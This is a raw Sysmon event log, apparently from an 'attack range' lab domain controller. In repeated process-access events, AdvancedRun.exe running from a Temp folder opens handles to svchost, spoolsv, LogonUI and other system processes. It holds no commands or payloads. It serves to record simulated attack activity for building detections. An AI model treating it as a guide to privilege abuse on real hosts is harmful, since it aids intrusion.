Run.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968394Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.750{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2800-000000002402}2836C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968393Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.744{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2600-000000002402}2820C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968392Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.743{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0ABD-61E7-2500-000000002402}2748C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968391Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.741{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB9-61E7-2300-000000002402}2592C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968390Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.740{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB5-61E7-2200-000000002402}2520C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968389Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.739{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB5-61E7-2100-000000002402}2512C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968388Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.739{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB1-61E7-1F00-000000002402}2104C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968387Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.736{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1700-000000002402}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968386Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.736{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1600-000000002402}1292C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968385Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.736{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1500-000000002402}1240C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968384Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.736{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1400-000000002402}1084C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.736{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968382Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.736{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1200-000000002402}400C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968381Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.733{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1100-000000002402}416C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000002968379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.730{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-0F00-000000002402}304C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.731{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-1000-000000002402}436C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 734700x80000000000000002968377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.528{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000002968376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.729{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AB0-61E7-0E00-000000002402}996C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+25ac|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 